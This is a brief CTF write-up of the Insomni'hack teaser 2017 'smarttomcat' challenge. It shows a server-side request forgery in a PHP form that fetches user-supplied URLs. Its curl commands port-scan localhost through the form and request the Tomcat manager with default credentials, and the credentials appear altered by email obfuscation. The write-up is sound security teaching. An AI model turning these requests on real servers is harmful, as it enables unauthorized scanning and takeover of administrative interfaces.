The Insomni’hack teaser 2017 was a fun CTF with a good spread between easy and hard challenges.
The smarttomcat challenge was an easy web challenge that was about attacking a badly secured tomcat server, as a user you where presented with a webpage that had an backend written in php, that backend called a tomcat server on localhost.
When looking at the form post data from the browser it became apparant that the url that the backend called was submitted by the form.
This enabled us to write a port scan as a simple bash loop:
for x in $(seq 1 65535); do echo $x >> /tmp/log && curl 'http://smarttomcat.teaser.insomnihack.ch/index.php' --data "u=http%3A%2F%2Flocalhost%3A$x%2F" >> /tmp/log;done
This didn’t really help us. And we realized that we could access the tomcat management url on the same port as the rest of the application. A simple google gave us the default username and password.
curl 'http://smarttomcat.teaser.insomnihack.ch/index.php' --data 'u=http://tomcat:email@example.com:8080/manager/html'